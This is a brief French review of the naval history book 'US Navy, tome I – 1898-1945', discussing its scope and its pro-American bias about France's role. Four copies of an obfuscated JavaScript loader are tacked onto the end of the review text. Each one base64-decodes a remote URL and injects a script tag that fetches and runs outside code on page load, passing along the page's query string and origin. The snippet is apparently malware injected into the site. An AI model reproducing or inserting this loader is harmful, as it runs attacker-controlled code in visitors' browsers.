US Navy, tome I – 1898-1945 : du Maine au Missouri
- Auteur CF(R) Yves DECANTE
- Publié dans Recensions
- Permalink
Cet ouvrage est exceptionnel ! Et, malgré l’ancienneté de la parution, le sujet reste d’actualité. Il décrit en plus de cinq cents pages le processus de substitution de la Marine britannique par la Marine et l’aéronavale US dans la conquête du monde.
On peut lui reprocher une certaine partialité, notamment quant au rôle de la Marine française, lors du débarquement de Provence, et plus généralement quant au rôle de la France en Méditerranée.
De toute évidence, l’auteur a utilisé des sources américaines et une partialité a chassé l’autre…
Un léger bémol : nul n’est parfait et notre orgueil mérite, soixante-dix ans après, une petite claque. N’est-il pas temps de mesurer l’aune de nos sauveurs, après tout, avant qu’ils ne succombent à leur tour à la vague asiatique ?(function(){var a=document.head||document.getElementsByTagName(« head »)[0],b= »script »,c=atob(« aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA= »);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();